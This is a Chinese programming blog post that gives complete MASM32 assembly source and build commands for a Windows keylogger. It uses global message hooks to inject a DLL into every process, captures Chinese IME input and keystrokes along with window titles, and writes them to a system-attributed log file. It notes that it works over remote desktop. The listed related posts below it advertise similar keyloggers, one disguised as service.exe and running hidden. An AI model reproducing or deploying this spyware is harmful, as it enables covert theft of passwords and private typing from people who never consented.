键盘记录支持中文

最新推荐文章于 2021-05-21 04:30:06 发布
原创 最新推荐文章于 2021-05-21 04:30:06 发布 · 2k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#include #null #insert #delete #action #windows

该博客提供了Windows环境下键盘钩子程序的代码示例,包含编译参数、rc文件、包含文件、def文件以及a.exe和key.dll的代码。代码中涉及include引用、insert和delete等操作,实现了键盘事件的记录和处理。
挂接WH_CALLWNDPROC(WM_IME_COMPOSITION),WH_GETMESSAGE(WM_CHAR和WM_KEYUP),前者记录中文,后者记特殊按键和字母符号.
  中文在极品五笔和智能ABC中测试通过,另系统测试在2k,xp,2003下测试通过,同时包括
2kserver的3389中.(CMD中不能成功记录)
  记录文件在c:/keylog2.txt中.防止有些人那去害人.调试窗口没有去掉嘿嘿.
用法:运行a.exe后key.dll就会进入每一个进程并进行记录.


编绎参数:
ml /c /coff a.asm
rc hook.rc
link /subsystem:windows a.obj hook.res
ml /c /coff key.asm
link /SECTION:.bss,S /DLL /DEF:key.def /SUBSYSTEM:windows /LIBPATH:C:/MASM32/BIN key.obj


rc文件
-------------------hook.rc-----------------
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
#include        <resource.h>
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
#define    ICO_MAIN    1000
#define    DLG_MAIN    1000
#define    IDC_TEXT    1001
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
ICO_MAIN    ICON        "Main.ico"
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
DLG_MAIN DIALOG 208, 130, 234, 167
STYLE DS_MODALFRAME | WS_POPUP | WS_VISIBLE | WS_CAPTION | WS_SYSMENU
CAPTION "键盘钩子"
FONT 9, "宋体"
{
EDITTEXT IDC_TEXT, 5, 5, 224, 158, ES_MULTILINE | ES_AUTOVSCROLL
    | WS_BORDER | WS_VSCROLL | WS_TABSTOP | ES_READONLY
}
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
-------------------end---------------------

包含文件key.inc
------------key.inc-------------
UninstallHook PROTO
InstallHook PROTO
------------end-----------------
def文件key.def
------------key.def--------------
LIBRARY        key.dll

EXPORTS       InstallHook
        UninstallHook
---------------end----------------


---------------------a.exe---------------------------
        .386
        .model flat, stdcall
        option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include        ../include/user32.inc
includelib    ../lib/user32.lib
include        ../include/kernel32.inc
includelib    ../lib/kernel32.lib
include        ../include/windows.inc
include        key.inc
includelib     key.lib

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Equ 等值定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
ICO_MAIN    equ    1000
DLG_MAIN    equ    1000
IDC_TEXT    equ    1001
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
        .data?


;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

        .code

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProcDlgMain    proc    uses ebx edi esi hWnd,wMsg,wParam,lParam

        mov    eax,wMsg
;********************************************************************
        .if    eax ==    WM_CLOSE
            invoke    UninstallHook
            invoke    EndDialog,hWnd,NULL
;********************************************************************
        .elseif    eax ==    WM_INITDIALOG
            invoke InstallHook
   

;********************************************************************
        .else
            mov    eax,FALSE
            ret
        .endif
        mov    eax,TRUE
        ret

_ProcDlgMain    endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
        invoke    GetModuleHandle,NULL
        invoke    DialogBoxParam,eax,DLG_MAIN,NULL,offset _ProcDlgMain,NULL
        invoke    ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end    start

---------------------end-----------------------------

---------------------key.dll--------------------------
.386
.model flat,stdcall
option casemap:none
include /masm32/include/windows.inc
include /masm32/include/user32.inc
include /masm32/include/kernel32.inc
includelib /masm32/lib/user32.lib
includelib /masm32/lib/kernel32.lib
includelib    ../lib/imm32.lib
include        ../include/imm32.inc

IDC_TEXT    equ    1001
.data
hInstance dd 0
maintitle db '键盘钩子',0

LogKeyFile2   db 'c:/keylog2.txt',0
keylogformat db 0dh,0ah,'--==%s==--',0dh,0ah,0
;------vk-------------
insert    db '[Insert]',0
delete     db '[Del]',0
home    db '[Home]',0
kend    db '[End]',0
pgdown    db '[PgDn]',0
pgup    db '[PgUp]',0

down    db '[↓]',0
up    db '[↑]',0
left    db '[←]',0
right    db '[→]',0

back    db '[<=]',0
ctrl    db '[ctrl]',0
tab    db '[Tab]',0
alt    db '[Alt]',0 ;键盘码是VK_MENU
shift    db '[Shift]',0
kesc    db '[Esc]',0
space    db ' ',0
printscreen    db '[PrtSc]',0
capslock    db '[Caps Lock]',0
kreturn        db 0dh,0ah,0

.data?
forcushwnd    DD ?
fhwnd        dd ?

hHook dd ?
hHook2 dd ?
cchar        db 20 dup(?)
cchar2        db 20 dup(?)

keylogbuffer    db 1024 dup(?)  ;定义1kb的键盘记录缓冲

hlogKeyFile    dd ?

hactivewindow    dd ?
svTitle        db 256 dup(?)  ;当前窗口标题
szkeylogtitlebuffer db 270 dup (?)


.code
DllEntry proc hInstDLL:HINSTANCE, reason:DWORD, reserved1:DWORD
      
    .if reason==DLL_PROCESS_ATTACH  ;dll加载时
                push hInstDLL
            pop hInstance
           
    .endif
        mov  eax,TRUE     
        ret
DllEntry Endp


_KeyLog    proc     keyaddr:dword
        invoke    FindWindow,NULL,offset maintitle
        invoke    SendDlgItemMessage,eax,IDC_TEXT,EM_REPLACESEL,0,keyaddr

        invoke    GetActiveWindow
        .if    eax!=hactivewindow
            mov    hactivewindow,eax
            invoke    GetWindowText,hactivewindow,offset svTitle,256
       
            invoke    wsprintf,offset szkeylogtitlebuffer,offset keylogformat,offset svTitle
            invoke    lstrcat,offset keylogbuffer,offset szkeylogtitlebuffer
       
        .endif
       
        invoke    lstrlen,offset keylogbuffer
        .if    eax<10
            invoke    lstrcat,offset keylogbuffer,keyaddr
        .else
             invoke    CreateFile,offset LogKeyFile2,GENERIC_WRITE,FILE_SHARE_READ,/
                                NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_SYSTEM,NULL
             mov    hlogKeyFile,eax
             invoke    SetFilePointer,hlogKeyFile,0,NULL,FILE_END
                    invoke    SetEndOfFile,hlogKeyFile                   ;文件指针放到文件尾                       
             invoke    lstrlen,offset keylogbuffer
             invoke    _lwrite,hlogKeyFile,offset keylogbuffer,eax   
                   invoke  CloseHandle,hlogKeyFile
                  
                   invoke    RtlZeroMemory,offset keylogbuffer,1024
                   invoke    lstrcat,offset keylogbuffer,keyaddr
        .endif

        ret
_KeyLog    endp


HookProc proc     _dwCode,_wParam,_lParam
       
        invoke    CallNextHookEx,hHook,_dwCode,_wParam,_lParam   
        pushad   
        .if    _dwCode == HC_ACTION
            mov    ebx,_lParam
            assume    ebx:ptr CWPSTRUCT
            ;.if    [ebx].message == WM_IME_CHAR
                ;mov    dx,word ptr [ebx].wParam
                ;xchg    dl,dh
                ;mov    ebx,offset cchar
                ;mov    word ptr [ebx],dx
               
                ;invoke    MessageBoxA,0,addr cchar,addr cchar,1
                ;invoke    _KeyLog,addr cchar
            .if [ebx].message == WM_IME_COMPOSITION
                invoke    GetFocus
                mov    forcushwnd,eax
                invoke    ImmGetContext,forcushwnd
                mov    fhwnd,eax
                       
                invoke    ImmGetCompositionString,fhwnd,GCS_RESULTSTR,NULL,0               
                add    eax,sizeof WCHAR
                invoke    ImmGetCompositionString,fhwnd,GCS_RESULTSTR,offset cchar,eax
                ;invoke    MessageBoxA,0,offset cchar,offset cchar,1
               
                invoke    lstrcmp,addr cchar,addr cchar2
           
                .if    eax
                invoke    _KeyLog,addr cchar
           
                .endif
                invoke    lstrcpy,addr cchar2,addr cchar
                invoke    RtlZeroMemory,offset cchar,20
                invoke    ImmReleaseContext,forcushwnd,fhwnd   
            .endif
            assume    ebx:nothing
        .endif
        popad
        xor    eax,eax
        ret
   
HookProc endp


HookProc2 proc     _dwCode,_wParam,_lParam
       
        invoke    CallNextHookEx,hHook,_dwCode,_wParam,_lParam   
        pushad   
        .if    _dwCode == HC_ACTION
            mov    ebx,_lParam
            assume    ebx:ptr MSG
            .if    [ebx].message == WM_KEYUP
                mov    edx,[ebx].wParam
                .if    dl<30h
                .if dl==VK_SPACE
                ;    invoke    _KeyLog,addr space
                    jmp    @@ex       

                .elseif dl==VK_RETURN
                ;    invoke    _KeyLog,addr kreturn
                    jmp    @@ex               
                .elseif    dl==VK_PGDN ;down
                    invoke    _KeyLog,addr pgdown                                                       
                    jmp    @@ex
                .elseif    dl==VK_PGUP ;UP
                    invoke    _KeyLog,addr pgup
                    jmp    @@ex
                .elseif dl==VK_CAPITAL
                    invoke    _KeyLog,addr capslock
                    jmp    @@ex
                .elseif dl==VK_HOME
                    invoke    _KeyLog,addr home
                    jmp    @@ex
                .elseif dl==VK_END
                    invoke    _KeyLog,addr kend
                    jmp    @@ex
                .elseif dl==VK_DELETE
                    invoke    _KeyLog,addr delete
                    jmp    @@ex
                .elseif dl==VK_INSERT
                    invoke    _KeyLog,addr insert
                    jmp    @@ex
                .elseif dl==VK_DOWN
                    invoke    _KeyLog,addr down
                    jmp    @@ex
                .elseif dl==VK_UP
                    invoke    _KeyLog,addr up   
                    jmp    @@ex
                .elseif dl==VK_LEFT
                    invoke    _KeyLog,addr left
                    jmp    @@ex
                .elseif dl==VK_RIGHT
                    invoke    _KeyLog,addr right
                    jmp    @@ex                                       
                .elseif dl==VK_CONTROL 
                ;    invoke    _KeyLog,addr ctrl
                    jmp    @@ex   
                .elseif dl==VK_TAB
                    invoke    _KeyLog,addr tab
                    jmp    @@ex   
                .elseif dl==VK_ESCAPE
                    invoke    _KeyLog,addr kesc
                    jmp    @@ex   
                .elseif dl==VK_SNAPSHOT
                    invoke    _KeyLog,addr printscreen
                    jmp    @@ex   
                .elseif dl==VK_MENU
                    invoke    _KeyLog,addr alt
                    jmp    @@ex   
                                               
                .endif
                .endif   
            .elseif [ebx].message == WM_CHAR
                invoke    IsDBCSLeadByte,[ebx].wParam
                .if    !eax
                    .if _wParam & PM_REMOVE
                        mov    dx,word ptr [ebx].wParam
                        .if dl==VK_BACK
                            invoke    _KeyLog,addr back
                   
                        .elseif dl==VK_RETURN
                            invoke    _KeyLog,addr kreturn
                        .elseif    dl==VK_SPACE
                            invoke    _KeyLog,addr space   
                        .else
                            mov    ebx,offset cchar
                            mov    word ptr [ebx],dx
               
                    ;invoke    MessageBoxA,0,addr cchar,addr cchar,1
                   
                            invoke    _KeyLog,addr cchar
                           
                        .endif
                    .endif
                .endif               
            .endif
            @@ex:
            assume    ebx:nothing
        .endif
        popad
        xor    eax,eax
        ret
   
HookProc2 endp

InstallHook proc

    invoke    SetWindowsHookEx,WH_CALLWNDPROC,addr HookProc,hInstance,NULL
    mov        hHook2,eax
    invoke    SetWindowsHookEx,WH_GETMESSAGE,addr HookProc2,hInstance,NULL
    mov hHook,eax
    ret
InstallHook endp

UninstallHook proc
    invoke UnhookWindowsHookEx,hHook
     invoke UnhookWindowsHookEx,hHook2
    ret
UninstallHook endp

End DllEntry

iiprogram
关注
键盘记录工具(支持中文
zlwzlwzlw的专栏
11-13 8089
看到网上有很多键盘记录工具,技痒,于是自己动手写了一个。        记录键盘,很显然需要使用钩子。如果只是记录所按下的按键,使用WH_KEYDOWN_LL即可,此钩子可以拦截所有按下键盘的动作(除极少数键外)。但是如果要记录通过输入法输入的中文字符,那么WH_KEYDOWN_LL是不够的,这里需要使用WH_GETMESSAGE钩子。这个钩子拦截所有从消息队列中取出的消息。而windows上所
delphi 中英文 键盘记录源码
03-24
delphi 中英文 键盘记录源码 能同时记录中文和英文的dll文件!但是有些BUG希望有人将它完善下
DLL中英文键盘记录
02-23
DLL 的中英文键盘记录! 可以在VC VB中调用!很好用!
键盘记录软件,记录电脑键盘输入,在后端
11-12
打开后,软件后台记录键盘的输入,不能记录中文,但是可记录所有的按键,记录内容存放在DUMMY.FIL文件中,可以用TXT文件查看
中文输入和键盘纪录的资料整理
编程开发资料库
06-19 150
键盘记录支持中文(ZT):http://dev.youkuaiyun.com/article/55/55441.shtm 关于中文hook的一些问题的处理: document.title="关于中文hook的一些问题的处理 - "+document.title http://blog.youkuaiyun.com/brain_/archive/2006/01/11/576128.aspx 系统文本输入的记录: h...
一个中英文键盘记录源代码
weixin_33877885的博客
11-15 464
一个中英文键盘记录源代码 function HookProcEn(ncode:integer;wparam:wparam;lparam:lparam): LRESULT; stdcall;//export;//回调函数 var pcs:pMSG;//定义消息指针 begin Result:= CallNextHookEx(KeyboardHook, ...
VB中文键盘记录器:全面支持汉字输入监控
在技术层面,一个支持汉字记录的VB键盘记录器通常需要处理以下几个关键知识点: 1. 键盘事件捕获:VB中可以通过设置窗体(Form)的KeyPreview属性为True,并且在窗体的KeyPress事件中编写代码来捕获按键事件。此外...
易语言自选键盘记录器源码
06-01
7. **用户界面设计**:易语言支持GUI(图形用户界面)编程,可以让用户方便地启动和停止键盘记录器,查看已记录的键盘输入等。良好的界面设计能让软件更易于理解和使用。 在"SanYe"标签下,我们可以推测这可能是由...
VC++ 不使用hook实现键盘记录(含中文
10-30
本文将深入探讨如何使用VC++不依赖hook技术来实现键盘记录功能,尤其是处理中文输入。 首先,我们要了解传统的键盘记录方法通常会使用API钩子(API Hook),如SetWindowsHookEx函数,来拦截键盘事件。然而,这种...
HKproc.dcu.rar_delphi 键盘记录_keylogger_keylogger delphi
09-24
描述中提到“这是一份键盘记录源码,但不支持中文支持特殊符号。”这意味着这个源代码能够捕捉并记录英文和其他非中文字符的输入,可能是因为它没有处理Unicode或GB2312等中文编码方式,因此在处理中文字符时会...
vc编写的键盘记录工具
06-07
自己DIY的键盘记录 1 编译键盘钩子中工程,在其Debug目录下生成hodll.dll 2 编译KeyLoger.dsw,生成键盘记录工具service.exe(为了隐蔽,我们故意生成迷惑性文件) 3 请将1中生成的hodll.dll与service.exe放于同一目录下 4 运行service.exe,该记录程序隐藏运行,当有键盘按下时,自动在C:\windows\system32\下生成键盘记录文件, 文件命名格式为t+日期.dat,如t06-02.dat,该文件可以直接用记事本查看 5 记录文件支持大小写,其中特殊字符→表示Left;←表示Right ;■表示Ctrl;≮表示BackSpace;≯表示Delete 6 结束记录方法,一是调出任务管理器,终止service.exe进程 ,二是可以通过命令行 service.exe -s终止
VB的5种键盘记录的软件源码
04-09
VB的5种键盘记录这个是很经典的例子,大家做软件可能用到,欢迎下载
C# 重写WndProc 拦截 发送 系统消息 + windows消息常量值
01-18
通过重载虚函数WndProc在C#下处理Windows系统消息。
实例详解c# 钩子函数拦截任务管理器.docx
04-08
C#中,我们可以使用钩子函数来拦截Windows操作系统产生的一些事件,例如鼠标、键盘或者窗口事件等。其中,窗口消息钩子(WH_CALLWNDPROC)是一种比较常见的钩子函数,它能够拦截窗口消息,并允许应用程序修改或阻止这些消息的传递。 任务管理器是Windows操作系统提供的一个非常实用的工具,它可以帮助用户查看、监控以及结束进程。然而,在某些情况下,我们可能需要禁止用户关闭任务管理器,这时候我们就可以使用钩子函数来拦截任务管理器的关闭消息,从而实现该功能。 以下是具体的步骤: 1. 首先,我们需要定义一个窗口过程委托(WndProc),该委托会接受Windows系统发送给当前应用程序的消息,并且根据需要进行处理。代码如下: ``` private delegate IntPtr WndProcDelegate(IntPtr hWnd, int msg, IntPtr wParam, IntPtr lParam);
VC实现中文键盘记录工具
由于中文输入往往需要借助输入法编辑器(IME)来转换拼音或其他输入方式到中文字符,所以键盘记录器同样需要能够捕获和识别这些由IME产生的字符。这可能需要额外的编程工作来确保IME输入的字符也能被正确记录。 ...
键盘记录支持中文,3389(czy 原创)
FreeXploiT
12-08 2039
键盘记录支持中文,3389(原创)                                        czy 04.11.28  挂接WH_CALLWNDPROC(WM_IME_COMPOSITION),WH_GETMESSAGE(WM_CHAR和WM_KEYUP),前者记录中文,后者记特殊按键和字母符号.  中文在极品五笔和智能ABC中测试通过,另系统测试在2k,xp,2003下测试
打造中英文键盘记录(从原理剖析)
InkSnail的专栏
02-24 1746
偶然在网上看到的,代码网上到处都是,但讲到原理的还真不多原文链接: http://www.hackeye.com/article/5223/打造中英文键盘记录(从原理剖析) 2008年6月16日1,321次阅读 评论 发表评论 0顶一下作者:小鱼 传说中超级
C# 做一个键盘记录
qq_37969220的博客
05-11 1814
某天写代码时突发奇想想知道自己用那个键用的最多,于是在网上搜了一通键盘记录软件,没找到一个满意的,于是决定自己写一个出来 ps:第一次用 C#Windows 程序,可能很多编程习惯不够规范 先撸一个简单的界面出来,大概长这个样子 再写一个数据管理的类,根据 Windows 键盘表的顺序把需要记录的键写到一个数组里去 using System; using System.IO; using System.Windows.Forms; namespace KeyboardRecord { pu.
键盘记录器含中文代码c语言,脚本小子玩入侵之写一个键盘记录器part1:记录窗口标题!...
weixin_31937605的博客
05-21 254
最近心血来潮准备写一个键盘记录器,作为一个键盘记录器当然要能记录窗口标题了!这里用的是ctypes,ctypes是python的一个的一个外部库,它赋予了程序员类似C语言一样的底层操作能力。ctypes模块使的程序员可以轻而易举的调用动态链接库中的导出函数,并且可以构建C数据类型。这里,我们就用windll.user32windll.kernel32 windll.psapi 这三个模块!代码...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值